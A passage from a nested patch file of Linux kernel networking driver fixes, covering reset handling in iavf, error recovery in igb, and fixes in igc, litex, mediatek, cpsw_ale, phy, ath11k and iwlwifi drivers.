+ 	reg_val = rd32(hw, IAVF_VF_ARQLEN1) & IAVF_VF_ARQLEN1_ARQENABLE_MASK;
+ 	if (!reg_val) {
+-		adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		dev_err(&adapter->pdev->dev, "Hardware reset detected\n");
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_PENDING);
+ 		mutex_unlock(&adapter->crit_lock);
+ 		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task, HZ * 2);
+@@ -3059,7 +3145,7 @@ continue_reset:
+ 
+ 	if ((adapter->flags & IAVF_FLAG_REINIT_MSIX_NEEDED) ||
+ 	    (adapter->flags & IAVF_FLAG_REINIT_ITR_NEEDED)) {
+-		err = iavf_reinit_interrupt_scheme(adapter);
++		err = iavf_reinit_interrupt_scheme(adapter, running);
+ 		if (err)
+ 			goto reset_err;
+ 	}
+@@ -3154,6 +3240,7 @@ continue_reset:
+ 
+ 	adapter->flags &= ~IAVF_FLAG_REINIT_ITR_NEEDED;
+ 
++	wake_up(&adapter->reset_waitqueue);
+ 	mutex_unlock(&adapter->client_lock);
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+@@ -3230,27 +3317,7 @@ static void iavf_adminq_task(struct work_struct *work)
+ 	} while (pending);
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+-	if ((adapter->flags & IAVF_FLAG_SETUP_NETDEV_FEATURES)) {
+-		if (adapter->netdev_registered ||
+-		    !test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section)) {
+-			struct net_device *netdev = adapter->netdev;
+-
+-			rtnl_lock();
+-			netdev_update_features(netdev);
+-			rtnl_unlock();
+-			/* Request VLAN offload settings */
+-			if (VLAN_V2_ALLOWED(adapter))
+-				iavf_set_vlan_offload_features
+-					(adapter, 0, netdev->features);
+-
+-			iavf_set_queue_vlan_tag_loc(adapter);
+-		}
+-
+-		adapter->flags &= ~IAVF_FLAG_SETUP_NETDEV_FEATURES;
+-	}
+-	if ((adapter->flags &
+-	     (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED)) ||
+-	    adapter->state == __IAVF_RESETTING)
++	if (iavf_is_reset_in_progress(adapter))
+ 		goto freedom;
+ 
+ 	/* check for error indications */
+@@ -4336,6 +4403,7 @@ static int iavf_close(struct net_device *netdev)
+ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
++	int ret = 0;
+ 
+ 	netdev_dbg(netdev, "changing MTU from %d to %d\n",
+ 		   netdev->mtu, new_mtu);
+@@ -4346,11 +4414,15 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 	}
+ 
+ 	if (netif_running(netdev)) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++		ret = iavf_wait_for_reset(adapter);
++		if (ret < 0)
++			netdev_warn(netdev, "MTU change interrupted waiting for reset");
++		else if (ret)
++			netdev_warn(netdev, "MTU change timed out waiting for reset");
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ #define NETIF_VLAN_OFFLOAD_FEATURES	(NETIF_F_HW_VLAN_CTAG_RX | \
+@@ -4945,6 +5017,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	INIT_WORK(&adapter->reset_task, iavf_reset_task);
+ 	INIT_WORK(&adapter->adminq_task, iavf_adminq_task);
++	INIT_WORK(&adapter->finish_config, iavf_finish_config);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+ 	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+@@ -4953,6 +5026,9 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* Setup the wait queue for indicating transition to down status */
+ 	init_waitqueue_head(&adapter->down_waitqueue);
+ 
++	/* Setup the wait queue for indicating transition to running state */
++	init_waitqueue_head(&adapter->reset_waitqueue);
++
+ 	/* Setup the wait queue for indicating virtchannel events */
+ 	init_waitqueue_head(&adapter->vc_waitqueue);
+ 
+@@ -5085,13 +5161,15 @@ static void iavf_remove(struct pci_dev *pdev)
+ 		usleep_range(500, 1000);
+ 	}
+ 	cancel_delayed_work_sync(&adapter->watchdog_task);
++	cancel_work_sync(&adapter->finish_config);
+ 
++	rtnl_lock();
+ 	if (adapter->netdev_registered) {
+-		rtnl_lock();
+ 		unregister_netdevice(netdev);
+ 		adapter->netdev_registered = false;
+-		rtnl_unlock();
+ 	}
++	rtnl_unlock();
++
+ 	if (CLIENT_ALLOWED(adapter)) {
+ 		err = iavf_lan_del_device(adapter);
+ 		if (err)
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index e989feda133c1..8c5f6096b0022 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -54,7 +54,7 @@ static void iavf_unmap_and_free_tx_resource(struct iavf_ring *ring,
+  * iavf_clean_tx_ring - Free any empty Tx buffers
+  * @tx_ring: ring to be cleaned
+  **/
+-void iavf_clean_tx_ring(struct iavf_ring *tx_ring)
++static void iavf_clean_tx_ring(struct iavf_ring *tx_ring)
+ {
+ 	unsigned long bi_size;
+ 	u16 i;
+@@ -110,7 +110,7 @@ void iavf_free_tx_resources(struct iavf_ring *tx_ring)
+  * Since there is no access to the ring head register
+  * in XL710, we need to use our local copies
+  **/
+-u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
++static u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
+ {
+ 	u32 head, tail;
+ 
+@@ -127,6 +127,24 @@ u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
+ 	return 0;
+ }
+ 
++/**
++ * iavf_force_wb - Issue SW Interrupt so HW does a wb
++ * @vsi: the VSI we care about
++ * @q_vector: the vector on which to force writeback
++ **/
++static void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector)
++{
++	u32 val = IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
++		  IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK | /* set noitr */
++		  IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_MASK |
++		  IAVF_VFINT_DYN_CTLN1_SW_ITR_INDX_ENA_MASK
++		  /* allow 00 to be written to the index */;
++
++	wr32(&vsi->back->hw,
++	     IAVF_VFINT_DYN_CTLN1(q_vector->reg_idx),
++	     val);
++}
++
+ /**
+  * iavf_detect_recover_hung - Function to detect and recover hung_queues
+  * @vsi:  pointer to vsi struct with tx queues
+@@ -352,25 +370,6 @@ static void iavf_enable_wb_on_itr(struct iavf_vsi *vsi,
+ 	q_vector->arm_wb_state = true;
+ }
+ 
+-/**
+- * iavf_force_wb - Issue SW Interrupt so HW does a wb
+- * @vsi: the VSI we care about
+- * @q_vector: the vector  on which to force writeback
+- *
+- **/
+-void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector)
+-{
+-	u32 val = IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
+-		  IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK | /* set noitr */
+-		  IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_MASK |
+-		  IAVF_VFINT_DYN_CTLN1_SW_ITR_INDX_ENA_MASK
+-		  /* allow 00 to be written to the index */;
+-
+-	wr32(&vsi->back->hw,
+-	     IAVF_VFINT_DYN_CTLN1(q_vector->reg_idx),
+-	     val);
+-}
+-
+ static inline bool iavf_container_is_rx(struct iavf_q_vector *q_vector,
+ 					struct iavf_ring_container *rc)
+ {
+@@ -687,7 +686,7 @@ err:
+  * iavf_clean_rx_ring - Free Rx buffers
+  * @rx_ring: ring to be cleaned
+  **/
+-void iavf_clean_rx_ring(struct iavf_ring *rx_ring)
++static void iavf_clean_rx_ring(struct iavf_ring *rx_ring)
+ {
+ 	unsigned long bi_size;
+ 	u16 i;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.h b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+index 2624bf6d009e3..7e6ee32d19b69 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+@@ -442,15 +442,11 @@ static inline unsigned int iavf_rx_pg_order(struct iavf_ring *ring)
+ 
+ bool iavf_alloc_rx_buffers(struct iavf_ring *rxr, u16 cleaned_count);
+ netdev_tx_t iavf_xmit_frame(struct sk_buff *skb, struct net_device *netdev);
+-void iavf_clean_tx_ring(struct iavf_ring *tx_ring);
+-void iavf_clean_rx_ring(struct iavf_ring *rx_ring);
+ int iavf_setup_tx_descriptors(struct iavf_ring *tx_ring);
+ int iavf_setup_rx_descriptors(struct iavf_ring *rx_ring);
+ void iavf_free_tx_resources(struct iavf_ring *tx_ring);
+ void iavf_free_rx_resources(struct iavf_ring *rx_ring);
+ int iavf_napi_poll(struct napi_struct *napi, int budget);
+-void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector);
+-u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw);
+ void iavf_detect_recover_hung(struct iavf_vsi *vsi);
+ int __iavf_maybe_stop_tx(struct iavf_ring *tx_ring, int size);
+ bool __iavf_chk_linearize(struct sk_buff *skb);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 00dccdd290dce..2fc8e60ef6afb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1961,9 +1961,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		case VIRTCHNL_EVENT_RESET_IMPENDING:
+ 			dev_info(&adapter->pdev->dev, "Reset indication received from the PF\n");
+ 			if (!(adapter->flags & IAVF_FLAG_RESET_PENDING)) {
+-				adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 				dev_info(&adapter->pdev->dev, "Scheduling reset task\n");
+-				queue_work(adapter->wq, &adapter->reset_task);
++				iavf_schedule_reset(adapter, IAVF_FLAG_RESET_PENDING);
+ 			}
+ 			break;
+ 		default:
+@@ -2237,6 +2236,10 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		iavf_process_config(adapter);
+ 		adapter->flags |= IAVF_FLAG_SETUP_NETDEV_FEATURES;
++		iavf_schedule_finish_config(adapter);
++
++		iavf_set_queue_vlan_tag_loc(adapter);
++
+ 		was_mac_changed = !ether_addr_equal(netdev->dev_addr,
+ 						    adapter->hw.mac.addr);
+ 
+@@ -2282,6 +2285,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 	case VIRTCHNL_OP_ENABLE_QUEUES:
+ 		/* enable transmits */
+ 		iavf_irq_enable(adapter, true);
++		wake_up(&adapter->reset_waitqueue);
+ 		adapter->flags &= ~IAVF_FLAG_QUEUES_DISABLED;
+ 		break;
+ 	case VIRTCHNL_OP_DISABLE_QUEUES:
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 18ffbc892f86c..3e0444354632d 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -9585,6 +9585,11 @@ static pci_ers_result_t igb_io_error_detected(struct pci_dev *pdev,
+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct igb_adapter *adapter = netdev_priv(netdev);
+ 
++	if (state == pci_channel_io_normal) {
++		dev_warn(&pdev->dev, "Non-correctable non-fatal error reported.\n");
++		return PCI_ERS_RESULT_CAN_RECOVER;
++	}
++
+ 	netif_device_detach(netdev);
+ 
+ 	if (state == pci_channel_io_perm_failure)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 273941f90f066..2e091a4a065e7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -2402,6 +2402,8 @@ static int igc_xdp_xmit_back(struct igc_adapter *adapter, struct xdp_buff *xdp)
+ 	nq = txring_txq(ring);
+ 
+ 	__netif_tx_lock(nq, cpu);
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
+ 	res = igc_xdp_init_tx_descriptor(ring, xdpf);
+ 	__netif_tx_unlock(nq);
+ 	return res;
+@@ -2795,15 +2797,18 @@ static void igc_xdp_xmit_zc(struct igc_ring *ring)
+ 	struct netdev_queue *nq = txring_txq(ring);
+ 	union igc_adv_tx_desc *tx_desc = NULL;
+ 	int cpu = smp_processor_id();
+-	u16 ntu = ring->next_to_use;
+ 	struct xdp_desc xdp_desc;
+-	u16 budget;
++	u16 budget, ntu;
+ 
+ 	if (!netif_carrier_ok(ring->netdev))
+ 		return;
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
++
++	ntu = ring->next_to_use;
+ 	budget = igc_desc_unused(ring);
+ 
+ 	while (xsk_tx_peek_desc(pool, &xdp_desc) && budget--) {
+@@ -6297,6 +6302,9 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
++
+ 	drops = 0;
+ 	for (i = 0; i < num_frames; i++) {
+ 		int err;
+diff --git a/drivers/net/ethernet/litex/litex_liteeth.c b/drivers/net/ethernet/litex/litex_liteeth.c
+index 35f24e0f09349..ffa96059079c6 100644
+--- a/drivers/net/ethernet/litex/litex_liteeth.c
++++ b/drivers/net/ethernet/litex/litex_liteeth.c
+@@ -78,8 +78,7 @@ static int liteeth_rx(struct net_device *netdev)
+ 	memcpy_fromio(data, priv->rx_base + rx_slot * priv->slot_size, len);
+ 	skb->protocol = eth_type_trans(skb, netdev);
+ 
+-	netdev->stats.rx_packets++;
+-	netdev->stats.rx_bytes += len;
++	dev_sw_netstats_rx_add(netdev, len);
+ 
+ 	return netif_rx(skb);
+ 
+@@ -185,8 +184,7 @@ static netdev_tx_t liteeth_start_xmit(struct sk_buff *skb,
+ 	litex_write16(priv->base + LITEETH_READER_LENGTH, skb->len);
+ 	litex_write8(priv->base + LITEETH_READER_START, 1);
+ 
+-	netdev->stats.tx_bytes += skb->len;
+-	netdev->stats.tx_packets++;
++	dev_sw_netstats_tx_add(netdev, 1, skb->len);
+ 
+ 	priv->tx_slot = (priv->tx_slot + 1) % priv->num_tx_slots;
+ 	dev_kfree_skb_any(skb);
+@@ -194,9 +192,17 @@ static netdev_tx_t liteeth_start_xmit(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ }
+ 
++static void
++liteeth_get_stats64(struct net_device *netdev, struct rtnl_link_stats64 *stats)
++{
++	netdev_stats_to_stats64(stats, &netdev->stats);
++	dev_fetch_sw_netstats(stats, netdev->tstats);
++}
++
+ static const struct net_device_ops liteeth_netdev_ops = {
+ 	.ndo_open		= liteeth_open,
+ 	.ndo_stop		= liteeth_stop,
++	.ndo_get_stats64	= liteeth_get_stats64,
+ 	.ndo_start_xmit         = liteeth_start_xmit,
+ };
+ 
+@@ -242,6 +248,11 @@ static int liteeth_probe(struct platform_device *pdev)
+ 	priv->netdev = netdev;
+ 	priv->dev = &pdev->dev;
+ 
++	netdev->tstats = devm_netdev_alloc_pcpu_stats(&pdev->dev,
++						      struct pcpu_sw_netstats);
++	if (!netdev->tstats)
++		return -ENOMEM;
++
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+ 		return irq;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index ed911d9946277..c236dba80ff1a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1452,8 +1452,9 @@ static int otx2_init_hw_resources(struct otx2_nic *pf)
+ 	if (err)
+ 		goto err_free_npa_lf;
+ 
+-	/* Enable backpressure */
+-	otx2_nix_config_bp(pf, true);
++	/* Enable backpressure for CGX mapped PF/VFs */
++	if (!is_otx2_lbkvf(pf->pdev))
++		otx2_nix_config_bp(pf, true);
+ 
+ 	/* Init Auras and pools used by NIX RQ, for free buffer ptrs */
+ 	err = otx2_rq_aura_pool_init(pf);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 49975924e2426..7e318133423a9 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -3425,23 +3425,6 @@ static int mtk_hw_deinit(struct mtk_eth *eth)
+ 	return 0;
+ }
+ 
+-static int __init mtk_init(struct net_device *dev)
+-{
+-	struct mtk_mac *mac = netdev_priv(dev);
+-	struct mtk_eth *eth = mac->hw;
+-	int ret;
+-
+-	ret = of_get_ethdev_address(mac->of_node, dev);
+-	if (ret) {
+-		/* If the mac address is invalid, use random mac address */
+-		eth_hw_addr_random(dev);
+-		dev_err(eth->dev, "generated random MAC address %pM\n",
+-			dev->dev_addr);
+-	}
+-
+-	return 0;
+-}
+-
+ static void mtk_uninit(struct net_device *dev)
+ {
+ 	struct mtk_mac *mac = netdev_priv(dev);
+@@ -3789,7 +3772,6 @@ static const struct ethtool_ops mtk_ethtool_ops = {
+ };
+ 
+ static const struct net_device_ops mtk_netdev_ops = {
+-	.ndo_init		= mtk_init,
+ 	.ndo_uninit		= mtk_uninit,
+ 	.ndo_open		= mtk_open,
+ 	.ndo_stop		= mtk_stop,
+@@ -3845,6 +3827,17 @@ static int mtk_add_mac(struct mtk_eth *eth, struct device_node *np)
+ 	mac->hw = eth;
+ 	mac->of_node = np;
+ 
++	err = of_get_ethdev_address(mac->of_node, eth->netdev[id]);
++	if (err == -EPROBE_DEFER)
++		return err;
++
++	if (err) {
++		/* If the mac address is invalid, use random mac address */
++		eth_hw_addr_random(eth->netdev[id]);
++		dev_err(eth->dev, "generated random MAC address %pM\n",
++			eth->netdev[id]->dev_addr);
++	}
++
+ 	memset(mac->hwlro_ip, 0, sizeof(mac->hwlro_ip));
+ 	mac->hwlro_ip_cnt = 0;
+ 
+diff --git a/drivers/net/ethernet/ti/cpsw_ale.c b/drivers/net/ethernet/ti/cpsw_ale.c
+index 231370e9a8017..2647c18d40d95 100644
+--- a/drivers/net/ethernet/ti/cpsw_ale.c
++++ b/drivers/net/ethernet/ti/cpsw_ale.c
+@@ -106,23 +106,37 @@ struct cpsw_ale_dev_id {
+ 
+ static inline int cpsw_ale_get_field(u32 *ale_entry, u32 start, u32 bits)
+ {
+-	int idx;
++	int idx, idx2;
++	u32 hi_val = 0;
+ 
+ 	idx    = start / 32;
++	idx2 = (start + bits - 1) / 32;
++	/* Check if bits to be fetched exceed a word */
++	if (idx != idx2) {
++		idx2 = 2 - idx2; /* flip */
++		hi_val = ale_entry[idx2] << ((idx2 * 32) - start);
++	}
+ 	start -= idx * 32;
+ 	idx    = 2 - idx; /* flip */
+-	return (ale_entry[idx] >> start) & BITMASK(bits);
++	return (hi_val + (ale_entry[idx] >> start)) & BITMASK(bits);
+ }
+ 
+ static inline void cpsw_ale_set_field(u32 *ale_entry, u32 start, u32 bits,
+ 				      u32 value)
+ {
+-	int idx;
++	int idx, idx2;
+ 
+ 	value &= BITMASK(bits);
+-	idx    = start / 32;
++	idx = start / 32;
++	idx2 = (start + bits - 1) / 32;
++	/* Check if bits to be set exceed a word */
++	if (idx != idx2) {
++		idx2 = 2 - idx2; /* flip */
++		ale_entry[idx2] &= ~(BITMASK(bits + start - (idx2 * 32)));
++		ale_entry[idx2] |= (value >> ((idx2 * 32) - start));
++	}
+ 	start -= idx * 32;
+-	idx    = 2 - idx; /* flip */
++	idx = 2 - idx; /* flip */
+ 	ale_entry[idx] &= ~(BITMASK(bits) << start);
+ 	ale_entry[idx] |=  (value << start);
+ }
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 7fbb0904b3c0f..82f74f96eba29 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3252,23 +3252,30 @@ static int __init phy_init(void)
+ {
+ 	int rc;
+ 
++	ethtool_set_ethtool_phy_ops(&phy_ethtool_phy_ops);
++
+ 	rc = mdio_bus_init();
+ 	if (rc)
+-		return rc;
++		goto err_ethtool_phy_ops;
+ 
+-	ethtool_set_ethtool_phy_ops(&phy_ethtool_phy_ops);
+ 	features_init();
+ 
+ 	rc = phy_driver_register(&genphy_c45_driver, THIS_MODULE);
+ 	if (rc)
+-		goto err_c45;
++		goto err_mdio_bus;
+ 
+ 	rc = phy_driver_register(&genphy_driver, THIS_MODULE);
+-	if (rc) {
+-		phy_driver_unregister(&genphy_c45_driver);
++	if (rc)
++		goto err_c45;
++
++	return 0;
++
+ err_c45:
+-		mdio_bus_exit();
+-	}
++	phy_driver_unregister(&genphy_c45_driver);
++err_mdio_bus:
++	mdio_bus_exit();
++err_ethtool_phy_ops:
++	ethtool_set_ethtool_phy_ops(NULL);
+ 
+ 	return rc;
+ }
+diff --git a/drivers/net/wireless/ath/ath11k/core.c b/drivers/net/wireless/ath/ath11k/core.c
+index b99180bc81723..893fefadbba96 100644
+--- a/drivers/net/wireless/ath/ath11k/core.c
++++ b/drivers/net/wireless/ath/ath11k/core.c
+@@ -870,7 +870,8 @@ int ath11k_core_check_dt(struct ath11k_base *ab)
+ }
+ 
+ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+-					   size_t name_len, bool with_variant)
++					   size_t name_len, bool with_variant,
++					   bool bus_type_mode)
+ {
+ 	/* strlen(',variant=') + strlen(ab->qmi.target.bdf_ext) */
+ 	char variant[9 + ATH11K_QMI_BDF_EXT_STR_LENGTH] = { 0 };
+@@ -881,15 +882,20 @@ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ 
+ 	switch (ab->id.bdf_search) {
+ 	case ATH11K_BDF_SEARCH_BUS_AND_BOARD:
+-		scnprintf(name, name_len,
+-			  "bus=%s,vendor=%04x,device=%04x,subsystem-vendor=%04x,subsystem-device=%04x,qmi-chip-id=%d,qmi-board-id=%d%s",
+-			  ath11k_bus_str(ab->hif.bus),
+-			  ab->id.vendor, ab->id.device,
+-			  ab->id.subsystem_vendor,
+-			  ab->id.subsystem_device,
+-			  ab->qmi.target.chip_id,
+-			  ab->qmi.target.board_id,
+-			  variant);
++		if (bus_type_mode)
++			scnprintf(name, name_len,
++				  "bus=%s",
++				  ath11k_bus_str(ab->hif.bus));
++		else
++			scnprintf(name, name_len,
++				  "bus=%s,vendor=%04x,device=%04x,subsystem-vendor=%04x,subsystem-device=%04x,qmi-chip-id=%d,qmi-board-id=%d%s",
++				  ath11k_bus_str(ab->hif.bus),
++				  ab->id.vendor, ab->id.device,
++				  ab->id.subsystem_vendor,
++				  ab->id.subsystem_device,
++				  ab->qmi.target.chip_id,
++				  ab->qmi.target.board_id,
++				  variant);
+ 		break;
+ 	default:
+ 		scnprintf(name, name_len,
+@@ -908,13 +914,19 @@ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ static int ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ 					 size_t name_len)
+ {
+-	return __ath11k_core_create_board_name(ab, name, name_len, true);
++	return __ath11k_core_create_board_name(ab, name, name_len, true, false);
+ }
+ 
+ static int ath11k_core_create_fallback_board_name(struct ath11k_base *ab, char *name,
+ 						  size_t name_len)
+ {
+-	return __ath11k_core_create_board_name(ab, name, name_len, false);
++	return __ath11k_core_create_board_name(ab, name, name_len, false, false);
++}
++
++static int ath11k_core_create_bus_type_board_name(struct ath11k_base *ab, char *name,
++						  size_t name_len)
++{
++	return __ath11k_core_create_board_name(ab, name, name_len, false, true);
+ }
+ 
+ const struct firmware *ath11k_core_firmware_request(struct ath11k_base *ab,
+@@ -1218,7 +1230,7 @@ success:
+ 
+ int ath11k_core_fetch_regdb(struct ath11k_base *ab, struct ath11k_board_data *bd)
+ {
+-	char boardname[BOARD_NAME_SIZE];
++	char boardname[BOARD_NAME_SIZE], default_boardname[BOARD_NAME_SIZE];
+ 	int ret;
+ 
+ 	ret = ath11k_core_create_board_name(ab, boardname, BOARD_NAME_SIZE);
+@@ -1235,6 +1247,21 @@ int ath11k_core_fetch_regdb(struct ath11k_base *ab, struct ath11k_board_data *bd
+ 	if (!ret)
+ 		goto exit;
+ 
++	ret = ath11k_core_create_bus_type_board_name(ab, default_boardname,
++						     BOARD_NAME_SIZE);
++	if (ret) {
++		ath11k_dbg(ab, ATH11K_DBG_BOOT,
++			   "failed to create default board name for regdb: %d", ret);
++		goto exit;
++	}
++
++	ret = ath11k_core_fetch_board_data_api_n(ab, bd, default_boardname,
++						 ATH11K_BD_IE_REGDB,
++						 ATH11K_BD_IE_REGDB_NAME,
++						 ATH11K_BD_IE_REGDB_DATA);
++	if (!ret)
++		goto exit;
++
+ 	ret = ath11k_core_fetch_board_data_api_1(ab, bd, ATH11K_REGDB_FILE_NAME);
+ 	if (ret)
+ 		ath11k_dbg(ab, ATH11K_DBG_BOOT, "failed to fetch %s from %s\n",
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index ef7617802491e..cb77dd6ce9665 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -8715,7 +8715,7 @@ static int ath11k_mac_setup_channels_rates(struct ath11k *ar,
+ 	}
+ 
+ 	if (supported_bands & WMI_HOST_WLAN_5G_CAP) {
+-		if (reg_cap->high_5ghz_chan >= ATH11K_MAX_6G_FREQ) {
++		if (reg_cap->high_5ghz_chan >= ATH11K_MIN_6G_FREQ) {
+ 			channels = kmemdup(ath11k_6ghz_channels,
+ 					   sizeof(ath11k_6ghz_channels), GFP_KERNEL);
+ 			if (!channels) {
+@@ -9279,6 +9279,7 @@ void ath11k_mac_destroy(struct ath11k_base *ab)
+ 		if (!ar)
+ 			continue;
+ 
++		ath11k_fw_stats_free(&ar->fw_stats);
+ 		ieee80211_free_hw(ar->hw);
+ 		pdev->ar = NULL;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath11k/wmi.c b/drivers/net/wireless/ath/ath11k/wmi.c
+index fad9f8d308a20..3e0a47f4a3ebd 100644
+--- a/drivers/net/wireless/ath/ath11k/wmi.c
++++ b/drivers/net/wireless/ath/ath11k/wmi.c
+@@ -7590,6 +7590,11 @@ complete:
+ 	rcu_read_unlock();
+ 	spin_unlock_bh(&ar->data_lock);
+ 
++	/* Since the stats's pdev, vdev and beacon list are spliced and reinitialised
++	 * at this point, no need to free the individual list.
++	 */
++	return;
++
+ free:
+ 	ath11k_fw_stats_free(&stats);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index 013aca70c3d3b..6b52afcf02721 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -2738,7 +2738,7 @@ int iwl_mvm_sta_rx_agg(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 	}
+ 
+ 	if (iwl_mvm_has_new_rx_api(mvm) && start) {
+-		u16 reorder_buf_size = buf_size * sizeof(baid_data->entries[0]);
++		u32 reorder_buf_size = buf_size * sizeof(baid_data->entries[0]);
+ 
+ 		/* sparse doesn't like the __align() so don't check */
+ #ifndef __CHECKER__
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index f6872b2a0d9d0..4d4db5f6836be 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -495,6 +495,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 	{IWL_PCI_DEVICE(0x7AF0, PCI_ANY_ID, iwl_so_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x51F0, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x51F1, PCI_ANY_ID, iwl_so_long_latency_imr_trans_cfg)},
++	{IWL_PCI_DEVICE(0x51F1, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x54F0, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7F70, PCI_ANY_ID, iwl_so_trans_cfg)},
+ 
+@@ -543,6 +544,7 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x51F0, 0x1551, iwl9560_2ac_cfg_soc, iwl9560_killer_1550i_160_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
